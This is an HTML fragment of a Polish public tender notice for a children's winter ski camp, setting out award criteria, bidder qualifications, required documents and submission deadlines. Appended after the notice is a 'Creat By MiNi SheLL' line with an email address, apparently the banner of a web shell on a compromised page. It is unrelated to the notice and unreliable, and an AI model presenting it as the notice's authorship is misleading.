(Dz. U. z 2016 r., poz. 452 z późn. zm.) przed rozpoczęciem wypoczynku oraz uzyskać stosowne zaświadczenie o zgłoszeniu wypoczynku. Kopię potwierdzenia zgłoszenia Wykonawca przedłoży Zamawiającemu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55243000-5 - Usługi w zakresie obozowisk dla dzieci</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-02-01 do 2025-02-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty, Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>KRYTERIUM I - cena - 60%<br/>KRYTERIUM II – dodatkowa wycieczka autokarowa ze zwiedzaniem - 20%<br/>KRYTERIUM III – zapewnienie korzystania z basenu – 20%.<br/>16.4.	Sposób oceny ofert: w trakcie oceny ofert, kolejno ocenianym ofertom, zostaną przyznane punkty wg poniższego wzoru:<br/><br/>Łączna ilość punktów = punkty uzyskane w ramach kryterium „Cena” <br/>+ (plus) punkty uzyskane w ramach kryterium „dodatkowa wycieczka autokarowa ze zwiedzaniem” + (plus) punkty uzyskane w ramach kryterium „zapewnienie korzystania z basenu”<br/><br/>16.5.	Sposób przyznania punktów w kryterium „Cena”<br/>Najniższa oferowana cena spośród ofert niepodlegających odrzuceniu<br/> „Cena”= --------------------------------------------------------------------- x 60 pkt<br/> Cena ofertowa badanej oferty<br/><br/>16.6.	Sposób przyznania punktów w kryterium „dodatkowa wycieczka autokarowa ze zwiedzaniem”<br/>16.6.1.	W celu uzyskania punktów w ramach kryterium „dodatkowa wycieczka autokarowa ze zwiedzaniem” Wykonawca zorganizuje wycieczkę autokarową polegającą na zwiedzaniu atrakcji turystycznych regionu (np. zamek, muzeum, kopalnia, kompleks po-militarny itp.). Wykonawca zapewni bezpłatny wstęp do wszystkich zwiedzanych obiektów. Wyjazd na basen nie będzie uznawany za wycieczkę autokarową. <br/>16.6.2.	Ocena kryterium zostanie dokonana na podstawie informacji zamieszczonych przez Wykonawcę w formularzu oferty. Wykonawca w formularzu oferty deklaruje bądź nie deklaruje zorganizowanie wycieczki autokarowej ze zwiedzaniem oraz podaje jej opis. <br/>W przypadku zadeklarowania zorganizowania dodatkowej wycieczki autokarowej ze zwiedzaniem, Wykonawca w formularzu oferty w ramach opisu wycieczki podaje co najmniej następujące informacje: miejscowość(ci), do której będzie zorganizowana wycieczka oraz atrakcje turystyczne, które będą zwiedzane. <br/>16.6.3.	W przypadku, gdy Wykonawca zadeklaruje zorganizowanie wycieczki i nie poda opisu wycieczki, Zamawiający nie przyzna punktów w ramach kryterium „dodatkowa wycieczka autokarowa ze zwiedzaniem”.<br/><br/>16.7.	Sposób przyznania punktów w kryterium „zapewnienie korzystania z basenu”<br/>16.7.1.	W celu uzyskania punktów w ramach kryterium „zapewnienie korzystania z basenu” Wykonawca zapewni jedną kąpiel trwającą min. 1 godzinę zegarową dla każdego z uczestników, w basenie w miejscu zakwaterowania lub w innym obiekcie dysponującym basenem.<br/>16.7.2.	Ocena kryterium zostanie dokonana na podstawie informacji zamieszczonych przez Wykonawcę w formularzu oferty. Wykonawca w formularzu oferty deklaruje bądź nie deklaruje korzystania z basenu oraz podaje czas trwania kąpieli. <br/>16.7.3.	W przypadku, gdy Wykonawca zadeklaruje korzystanie z basenu i nie poda czasy trwania kąpieli, Zamawiający nie przyzna punktów w ramach kryterium „zapewnienie korzystania z basenu”.<br/>16.8.	Zamawiający uzna za najkorzystniejszą tę ofertę, która uzyska największą łączną ilość punktów spośród ofert niepodlegających odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dodatkowa wycieczka autokarowa ze zwiedzaniem</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zapewnienie korzystania z basenu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 5.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>5.2.	O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy na potwierdzenie zdolności technicznej lub zawodowej<br/>5.2.1.	w zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, - wykażą, że posiadają wpis do rejestru organizatorów turystyki i pośredników turystycznych zgodnie z ustawą z dnia 24 listopada 2017 r. o imprezach turystycznych i powiązanych usługach turystycznych,<br/><br/>5.2.2.	w zakresie doświadczenia - wykażą, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej dwie usługi polegające na organizacji zimowego lub letniego wypoczynku dla minimum 40 uczestników każdy wypoczynek <br/><br/>5.2.3.	w zakresie kwalifikacji zawodowych - wykaże osoby skierowane przez wykonawcę do realizacji zamówienia spełniające niżej określone wymagania: <br/>1)	kierownik wypoczynku posiadający kwalifikacje określone w ustawie o systemie oświaty (t.j. Dz.U. z 2022 r. poz. 2230 z późn. zm.),<br/>2)	3 osoby posiadające uprawnienia wychowawcy wypoczynku posiadający kwalifikacje określone w ustawie o systemie oświaty (t.j. Dz.U. z 2022 r. poz. 2230 z późn. zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">9.2.	W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, zamawiający żąda następujące podmiotowe środki dowodowe: <br/>9.2.1. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">9.1.	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych: <br/>9.1.1.	Wpis do rejestru organizatorów turystyki i pośredników turystycznych zgodnie z ustawą z dnia 24 listopada 2017 r. o imprezach turystycznych i powiązanych usługach turystycznych,<br/><br/>9.1.2.	Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane należycie zgodnie z załącznikiem nr 8.<br/>9.1.3. dowody określające, czy usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy,<br/>9.1.4.	Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami zgodnie z załącznikiem nr 9.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W celu potwierdzenia zgodności oferowanej usługi z opisem przedmiotu zamówienia Zamawiający żąda złożenia wraz z ofertą przedmiotowych środków dowodowych. <br/>8.2. Zamawiający wymaga złożenia: <br/>8.2.1. szczegółowego programu zimowiska (załącznik nr 6 do SWZ) z podziałem na poszczególne dni i godziny z uwzględnieniem:<br/>1)	posiłków,<br/>2)	ilości godzin prowadzonego szkolenia narciarskiego przez co najmniej 5 dni,<br/>3)	deklaracji o zapewnieniu każdemu uczestnikowi sprzętu narciarskiego, tj.: butów oraz nart, z możliwością ich wymiany w razie niedopasowania, uszkodzenia itp. (uczestnicy zimowiska zapewnią sobie kaski ochronne we własnym zakresie), <br/>4)	deklaracji o zaopatrzeniu każdego uczestnika w skipass umożliwiający korzystanie z urządzeń ośrodka narciarskiego przez cały okres szkolenia (ważny przez 4 godziny, bez limitu zjazdów),<br/>5)	ilości wycieczek autokarowych wraz z podaniem zwiedzanych atrakcji turystycznych regionu,<br/>6)	ilości wycieczek pieszych wraz z podaniem zwiedzanych atrakcji turystycznych regionu,<br/>7)	ilości i tematyki konkursu,<br/>8)	ilości zorganizowanych ognisk,<br/>9)	innych form aktywności, np. basen, dyskoteka.<br/>8.2.2. opisu obiektu i pomieszczeń (załącznik nr 7 do SWZ) zawierający co najmniej następujące informacje: <br/>1	adres miejsca zakwaterowania	<br/>2	usytuowanie stoku, na którym będzie prowadzone szkolenie narciarskie <br/>3	czy obiekt jest murowany	<br/>4	czy teren jest ogrodzony <br/>5	czy teren jest oświetlony <br/>6	czy obiekt spełnia wymagania ochrony przeciwpożarowej, ochrony środowiska oraz warunki higieniczno-sanitarne, określone w przepisach o ochronie przeciwpożarowej, ochronie środowiska i Państwowej Inspekcji Sanitarnej	<br/>7	czy pokoje są maksymalnie 4-osobowe z łazienkami (WC, umywalka, prysznic)	<br/>8	opis wyposażenia pokoi (wyposażenie pokoi ma obejmować co najmniej: szafę ubraniową z wieszakami, stolik i krzesła oraz szafki osobiste przy łóżkach)<br/>8.2.3. ważnej opinii potwierdzającej spełnianie przez obiekt wymagań ochrony przeciwpożarowej, wydanej przez właściwego miejscowo komendanta powiatowego (miejskiego) Państwowej Straży Pożarnej. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> szczegółowy programu zimowiska (załącznik nr 6 do SWZ)<br/>opis obiektu i pomieszczeń (załącznik nr 7 do SWZ)<br/>ważna opinia potwierdzająca spełnianie przez obiekt wymagań ochrony przeciwpożarowej, wydana przez właściwego miejscowo komendanta powiatowego (miejskiego) Państwowej Straży Pożarnej. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz oferty, oświadczenie o braku podstaw do wykluczenia; oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu; zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji niezbędnych zasobów - jeżeli dotyczy; oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na podstawie art.117 ust.<br/>4 ustawy pzp - jeżeli dotyczy; pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego; pełnomocnictwo upoważniające do podpisania i złożenia oferty, jeżeli ofertę składa pełnomocnik. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, składa dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej<br/>tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający zgodnie z art. 455 ustawy Pzp przewiduje możliwość wprowadzenia istotnych zmian do treści zawartej umowy w następującym zakresie: <br/>1)	terminu i zakresu przedmiotu umowy w przypadku wystąpienia siły wyższej,<br/>2)	terminu w przypadku przedłużających się procedur związanych z wykorzystaniem przez Wykonawców środków ochrony prawnej w zamówieniach publicznych, <br/>3)	minimalnej gwarantowanej liczby uczestników zimowiska,<br/>4)	zmiany osób skierowanych do realizacji zamówienia, z zastrzeżeniem, że są spełnione warunki udziału w postępowaniu określone w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl. Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy na Platformie e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-07 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com